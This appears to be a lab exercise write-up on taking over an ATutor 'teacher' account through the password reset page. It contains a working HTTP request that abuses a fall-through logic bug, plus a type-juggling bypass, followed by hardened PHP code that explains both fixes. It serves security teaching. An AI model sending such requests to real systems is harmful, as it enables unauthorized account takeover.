5.5.2
Given everything you have learned about type juggling, recreate the compromise of the “teacher” account using the “Forgot Password” function WITHOUT updating the email address.
Solution 1
- Password modification to any arbitrary password for the user
- This is a logic bug: the code does not exit after the failure branch, so execution falls through to the password-change code. It is not a type juggling bug, however.
POST /ATutor/password_reminder.php HTTP/1.1
Host: 192.168.184.103
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://192.168.184.103
Connection: close
Referer: http://192.168.184.103/ATutor/password_reminder.php
Cookie: ATutorID=a6db961helpugidlkpnpm29dp4; flash=no; _ga=GA1.1.1101142951.1656417992; _gid=GA1.1.1314454257.1656417992; m_Networking=null; m_Content Navigation=null; m_Related Topics=null; m_Users Online=null; m_Glossary=null; m_Search=null; m_Polls=null; m_Forum Posts=null; side-menu=; showSubNav_i=on; _gat=1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
g=100000000000&id=1&form_change=true&h=&form_password_hidden=noob
Solution 2
- Type juggling brute force to enter the else clause
<?php
// Excerpt of ATutor's password_reminder.php (the vulnerable check)
$hash = sha1($_REQUEST['id'] + $_REQUEST['g'] + $row['password']);
$hash_bit = substr($hash, 5, 15);
# Compare hash_bit with the 'h' value that we control --> set to '0'
if ($_REQUEST['h'] != $hash_bit) {
    $msg->addError('INVALID_LINK');
    $savant->display('password_reminder_feedback.tmpl.php');
} else if (($_REQUEST['h'] == $hash_bit) && !isset($_POST['form_change'])) {
    // ...
}

// Stand-alone test of the loose comparison: a hash fragment of the form
// "0e<digits>" is a numeric string, so PHP's == compares it to '0' as a number
$hash_bit = '0e1111111';
$h = '0';
print $hash_bit;
print $h;
if ($hash_bit == $h) {
    print "True";
}
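The following is an added example, not ATutor's code, covering both solutions above: it shows why the loose `==` in the excerpt can be satisfied by a `0e...` fragment and `h=0`, contrasts that with `hash_equals()`, and rebuilds the check so that the error branch fails closed instead of falling through to the password change (the logic bug behind Solution 1). The function names (`loose_check`, `strict_check`, `verify_reset_token`, `handle_reset`) and all input values are constructed for illustration; `PLACEHOLDER_PASSWORD_HASH` stands in for the user's stored password hash.

```php
<?php
// Added example, not ATutor's code. Demonstrates the loose-comparison flaw,
// the strict replacement, and a fail-closed reset handler. All values are
// constructed for illustration.

// The original check: both operands are numeric strings ("0e1111111" is
// 0 * 10^1111111), so == compares them as numbers and the check passes.
function loose_check(string $hash_bit, string $h): bool
{
    return $hash_bit == $h;
}

// Strict, constant-time comparison: the strings must match byte for byte,
// so a "0e<digits>" fragment no longer matches '0'.
function strict_check(string $hash_bit, string $h): bool
{
    return hash_equals($hash_bit, $h);
}

// Hardened token check (hypothetical helper). Concatenation ('.') replaces
// '+': '+' is arithmetic, so the operands are coerced to numbers and the
// stored password hash contributes at most its leading digits to the sha1
// input.
function verify_reset_token(string $id, string $g, string $stored_hash, string $h): bool
{
    $hash     = sha1($id . $g . $stored_hash);
    $hash_bit = substr($hash, 5, 15);
    return hash_equals($hash_bit, $h);
}

// Request handling modelled on the original control flow, but failing closed:
// a bad token returns immediately, so the form_change branch that updates the
// password is never reached with an invalid 'h'.
function handle_reset(array $request, string $stored_hash): string
{
    $id = $request['id'] ?? '';
    $g  = $request['g']  ?? '';
    $h  = $request['h']  ?? '';

    if (!verify_reset_token($id, $g, $stored_hash, $h)) {
        return 'INVALID_LINK';   // nothing below runs for a bad token
    }
    if (!isset($request['form_change'])) {
        return 'SHOW_FORM';
    }
    return 'PASSWORD_CHANGED';
}

// Constructed inputs.
$magic_fragment = '0e1111111';            // not a real sha1 output
$attacker_h     = '0';
$stored_hash    = 'PLACEHOLDER_PASSWORD_HASH';

var_dump(loose_check($magic_fragment, $attacker_h));
var_dump(strict_check($magic_fragment, $attacker_h));

// Empty 'h' with form_change=true, as in the Solution 1 request.
var_dump(handle_reset(
    ['id' => '1', 'g' => '100000000000', 'form_change' => 'true', 'h' => ''],
    $stored_hash
));

// A token derived by the same rule is still accepted.
$good_h = substr(sha1('1' . '100000000000' . $stored_hash), 5, 15);
var_dump(handle_reset(
    ['id' => '1', 'g' => '100000000000', 'form_change' => 'true', 'h' => $good_h],
    $stored_hash
));
```

Run with `php` from the command line. `loose_check` returns true for the `0e` fragment, `strict_check` returns false, the Solution 1 style request gets `INVALID_LINK` and never reaches the password-change branch, and only the correctly derived `h` produces `PASSWORD_CHANGED`. Two independent fixes are at work: `hash_equals()` removes the numeric-string comparison that Solution 2 relies on, and the early `return` removes the fall-through that Solution 1 relies on; either one alone leaves the other bug in place.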
